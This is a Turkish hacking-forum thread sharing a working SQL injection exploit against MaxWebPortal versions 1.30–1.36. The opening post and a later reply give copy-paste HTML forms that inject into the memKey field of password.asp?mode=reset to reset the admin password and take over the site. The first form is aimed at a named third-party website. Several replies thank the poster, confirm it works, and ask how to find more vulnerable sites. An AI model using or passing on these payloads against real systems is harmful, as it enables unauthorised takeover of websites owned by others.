

Maxwebportal Sitelerinde Admin Olmak Çok Kolay ;)
-
arkadşlar hani varya adamlar yazmış bi portal adınıda maxwebportal koymuşlar vallahi yonetim paneli super portalın ama elemanlar bi kaç açık bırakmışlar bende bunlardan bitanesini anlatayım dedim size artı bide foruma katkım olsun dedim .... remote yazacaktı yazmamış ben yazıyım dedim hem boylece kaynaşırız :P
ben fazla uzatmayacam ahanda alet size bundan daha sade hale gelmiyor denendi test edildi onaylandı
<form action="http://www.ITFAIYEBIRLIGI.COM/password.asp?mode=reset" method="post">
<br>
şifre: <input name="pass" type="text" value="remote" size="150"><br>
şifre onayı: <input name="pass2" type="text" value="remote" size="150"><br>
admin numarası: <input name="memId" type="text" value="-1" size="150"><br>
bunu değiştirme: <input name="memKey" type="text" value="foo') or M_Name='admin' or ('1'='2" size="150"><br><input name="Submit" type="submit" value="Gönder dayi">bunları kopyalayın
text sonra html olarak kaydedin ilk denemeyi
üzerinde yaptı RemotE ile beraber ama sizin indirmek istediğiniz maxwebportal yuklu sitenin adresini kodların ilk satırında bulunan
http://www.ITFAIYEBIRLIGI.COM/password.asp?mode=reset bunu yerine sizin sitenin adresii
+/password.asp?mode=reset yazıp kaydediyorsunuz sonra html dosyasını çalıştırıp "Gönder dayı" düğmesine tıklayınca sizin yaazdığınız sitede adminsiniz
standart olarak kullanıcı adi admin şifremizde remote panele girdikten sonra isterseniz değiştirin :D :D
neyse fazla laf yapmayalım.. hadi hayırlısı olsunnnnn bash bash ;)
Not:
MaxWebPortal MaxWebPortal 1.35 ,1.33 ,1.32 ,1.31 1.30 versiyonlar için geçerlidir... ;)
-
valla helal olsun
%100 çalışıyo
-
Calısmasına calısıyorda burda kullanıcı adın degısmıyo sanırım admın olarak gırıyorsun :) sifreyide remote olarak kabul ediyo
-
Removed...
-
hacı eyw guzel olmusda maxwebportal olup olmadıgını nasıl anlicaz bi sitenin??
-
sitenin alt tarafınfa yazıyo
-
yaa bu siteden başka diğer açıklı siteleri nasıl buluyoz
-
Tabi RemotE olarak kabul Edicek Script e katkım var benim Baratte Saol Kanka Paylaştıqın için milletle halkımızla :D
-
Yukarida verilen Version 1.35 icin buda Version 1.36 için olan
<form action="http://[URL]/password.asp?mode=reset" method="post"><br />
<br />
<br />
<br />
pass1: <input name="pass" type="text" value="123456" size="150"><<br />
br><br />
pass2: <input name="pass2" type="text" value="123456" size="150"><<br />
br><br />
Id: <input name="memId" type="text" value="-1" size="150"><<br />
br><br />
Member Key: <input name="memKey" type="text" value="foo') or M_Name='admi<br />
n' or ('1'='2" size="150"><br />
<br />
<br />
<input name="Submit" type="submit" value="Submit">Gorüldügü üzere sifre kismina istediginizi yazabilirsiniz.
-
ustatlarım ben bu söylediklerinizi yapamadım Submit (gönder dayı) dedikten sonra beni admini olmak istediğim portala götürüyor ama hala dışardayım login kısmına giriyorum tıklıyorum olmuyor username ye admin yazıyorum yine olmuyor yanlış yaptığım şey ne lütfen anlatırmısınız
-
bu nebiçim açıklama doğru düzgün Türkçe cümle kuramamışsın sen nedemek istediğini anlayabildin mi? cünkü ben anlayamadım lütfen Türkçeye birazdaha dikkat.böylece konularda anlaşılır olur.